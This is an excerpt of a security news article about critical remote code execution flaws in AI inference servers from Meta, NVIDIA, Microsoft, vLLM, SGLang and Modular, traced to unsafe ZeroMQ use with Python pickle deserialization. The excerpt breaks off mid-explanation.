Critical RCE Flaws In AI Inference Engines Expose Meta, Nvidia, And Microsoft Frameworks

By AnuPriya
Publication Date: 2025-11-17 09:47:00

Security researchers at Oligo Security have uncovered a series of critical Remote Code Execution vulnerabilities affecting widely deployed AI inference servers from major technology companies.

The flaws impact frameworks developed by Meta, NVIDIA, Microsoft, and open-source projects, including vLLM, SGLang, and Modular, potentially exposing enterprise AI infrastructure to serious security risks.

The vulnerabilities stem from a common root cause dubbed ShadowMQ—the unsafe use of ZeroMQ (ZMQ) combined with Python’s pickle deserialization mechanism.

This security flaw spread across multiple AI frameworks through code reuse, with developers copying vulnerable code patterns from one project to another, sometimes line-for-line.

The problem originated with Meta’s Llama Stack, where researchers discovered the use of ZMQ’s recv_pyobj() method, which deserializes incoming data using Python’s pickle module.

This creates a critical security issue because pickle…

Related Posts